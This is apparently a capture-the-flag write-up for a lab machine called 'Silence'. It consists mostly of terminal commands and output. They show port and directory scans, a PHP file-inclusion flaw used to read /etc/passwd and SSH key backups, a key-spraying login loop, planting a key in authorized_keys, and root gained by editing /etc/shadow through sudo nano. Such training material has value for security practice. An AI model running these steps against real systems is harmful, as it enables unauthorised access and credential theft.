Month: February 2021
Protected: pg-nickel-private
Protected: ptd-kingschultz-private
Protected: ptd-fullmounty-private
Protected: htb-ophiuchi-nl
Protected: ptd-Merry-Go-Round-private
Protected: pg-algernon-private
Protected: pg-billyboss-private
ptd-silence-private
.
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $cat allports.nmap # Nmap 7.91 scan initiated Wed Feb 17 08:03:40 2021 as: nmap -A -oN allports.nmap 10.150.150.55 Nmap scan report for 10.150.150.55 Host is up (0.032s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rw-r--r-- 1 0 0 13 Jun 12 2020 test | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.66.66.42 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 139/tcp open netbios-ssn Samba smbd 4.6.2 445/tcp open netbios-ssn Samba smbd 4.6.2 1055/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: 53m37s |_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-02-17T08:57:32 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Feb 17 08:03:55 2021 -- 1 IP address (1 host up) scanned in 14.70 seconds ┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
.
┌─[✗]─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $dirb http://10.150.150.55 /usr/share/wordlists/10k-most-common.txt -X .php ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Thu Feb 18 08:27:26 2021 URL_BASE: http://10.150.150.55/ WORDLIST_FILES: /usr/share/wordlists/10k-most-common.txt EXTENSIONS_LIST: (.php) | (.php) [NUM = 1] ----------------- GENERATED WORDS: 10000 ---- Scanning URL: http://10.150.150.55/ ---- + http://10.150.150.55/trick.php (CODE:200|SIZE:0) + http://10.150.150.55/info.php (CODE:200|SIZE:70050) + http://10.150.150.55/??????.php (CODE:200|SIZE:10918) + http://10.150.150.55/?????.php (CODE:200|SIZE:10918) ----------------- END_TIME: Thu Feb 18 08:32:58 2021 DOWNLOADED: 10000 - FOUND: 4 ┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $cat trick.php <?php include($_GET['page']); ?>
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $curl -X POST –data “file=browser.php” 10.150.150.55/info.php
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $smbclient -L 10.150.150.55 -U "" -N Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers IPC$ IPC IPC Service (ubuntu server (Samba, Ubuntu)) SMB1 disabled -- no workgroup available
trick.php?page=index.html
curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=index.php' | base64 -d > index.php
En in die source vind je dan:
index.php?path=/
=> http://10.150.150.55/index.php?path=/
http://10.150.150.55/index.php?path=/home/sally/backup/SSHArchiveBackup.tar.gz
curl ‘http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/sally/backup/SSHArchiveBackup.tar.gz’ | base64 -d > home/sally/backup/SSHArchiveBackup.tar.gz
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $ls -la total 256 drwxr-xr-x 1 user user 138 Feb 17 10:55 . drwxr-xr-x 1 user user 2034 Feb 17 08:02 .. -rw-r--r-- 1 user user 1617 Feb 17 08:03 allports.nmap -rw-r--r-- 1 user user 56184 Feb 17 10:45 browser.php -rw-r--r-- 1 user user 6 Feb 17 08:05 hallo.txt -rw-r--r-- 1 user user 4694 Feb 17 10:24 index.php -rw-r--r-- 1 user user 183770 Feb 17 10:55 SSHArchiveBackup.tar.gz -rw-r--r-- 1 user user 13 Feb 17 08:06 test ┌─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/sally/backup/SSHArchiveBackup.tar.gz' | base64 -d > SSHArchiveBackup.tar.gz
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/etc/passwd' | base64 -d > passwd % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 100 4128 100 4128 0 0 58971 0 --:--:-- --:--:-- --:--:-- 58971 ┌─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $cat passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin --snip-- sshd:x:126:65534::/run/sshd:/usr/sbin/nologin gary:x:1001:1001::/home/gary:/bin/sh john:x:1002:1002::/home/john:/bin/sh sally:x:1003:1003::/home/sally:/bin/sh alice:x:1004:1004::/home/alice:/bin/sh ftp:x:127:133:ftp daemon,,,:/srv/ftp/home/:/usr/sbin/nologin ftpuser:x:1005:1005::/home/ftpuser:/bin/sh Debian-snmp:x:128:136::/var/lib/snmp:/bin/false ┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/alice/myFile.txt' | base64 -d > myFile.txt
for key in id_rsa*; do echo $key; ssh -p 1055 -o "PreferredAuthentications=publickey" alice@10.150.150.55 -i $key; done En dan zelfde voor andere users (gary, sally en alice) for key in id_rsa*; do echo $key; ssh -p 1055 -o "PreferredAuthentications=publickey" john@10.150.150.55 -i $key; done
curl ‘http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/john/FLAG79.txt’ | base64 -d > FLAG79.txt
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC9I2y+p4cBMuaydINICFfYW7EFhDJA0DaLxokCz5UutruL+oNA2oJmeAqdK1CaHyfQd56TSnzCruadO3mOCjzCLBuxDxYTJxsOpOaaJP/fUfFrUG2A1rqQzxXYy6ylQEJzyN+bdO5U3C7HpY7W5LMRZls8bw8YhO+PMZVS7Nv6z/+iDbqk56RyG2yDcb8aJDX3WTv0jTMbNRCUfn2dZzoXymGbZcKpUd2ep4u+G4wHOceDHxAAB2bPZYIJcEsTsmDjtKueJCb9deOOWtZ/Y9ZLmnA807KiHhbAquiWTazNNFiFrKQv0/aJpW9q19ZYRE1GUz6WNLcYFJsbBzLWmjTXMoHIBtNVnd0KuRYKubRNcENNIg2IebCdV5NcYuzE8+AUGyIR8EAmZ4s8XCWMk/yj1kPep+PcyHMj+QaP6kn3i1ub2As39K6WB6txDo4CzIv3EFWprtRX3o43/ItSLVmhTK2QVfgEcefAyCV52b8LKvjPJ0QZB1Ka2L5ogagc9XU= root@parrot-virtual" > authorized_keys
┌─[✗]─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $sudo ssh -i id_rsa john@10.150.150.55 -p 1055
Silence Please
Last login: Sat Jul 4 02:27:27 2020 from 10.210.210.55
$ id
uid=1002(john) gid=1002(john) groups=1002(john),1006(netAdmin)
$ cat FLAG79.txt
3ca569f9d5bc771b0457c4f4d42d29c4824e8d70
$ sudo -l
Matching Defaults entries for john on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
logfile=/var/log/sudo.log
User john may run the following commands on ubuntu:
(ALL) NOPASSWD: /usr/bin/nano
$ pwd
/home/john/.ssh
$ openssl passwd -6 -salt xyz yourpass
$6$xyz$VKswtvLoVpOLcpjDMIFXhxa8ukqqKSKHjcPBLZUk9NxWldmlFQY4stUGo.QjEhav7mp86ih2PRqYPqjkhWi5y.
$
$ nano /etc/shadow
$ id
uid=1002(john) gid=1002(john) groups=1002(john),1006(netAdmin)
$ sudo nano /etc/shadow
$ su root
Password:
root@ubuntu:/home/john# cd /root
root@ubuntu:~# ls
FLAG80.txt hiddenFile snap
root@ubuntu:~# cat FLAG80.txt
75a60cd346351234ecb8348d7c1da94dac75fc4c
root@ubuntu:~#
root@ubuntu:~# cat /etc/shadow | grep root
root:$6$xyz$VKswtvLoVpOLcpjDMIFXhxa8ukqqKSKHjcPBLZUk9NxWldmlFQY4stUGo.QjEhav7mp86ih2PRqYPqjkhWi5y.:18501:0:99999:7:::
root@ubuntu:~#
Author : Puckiestyle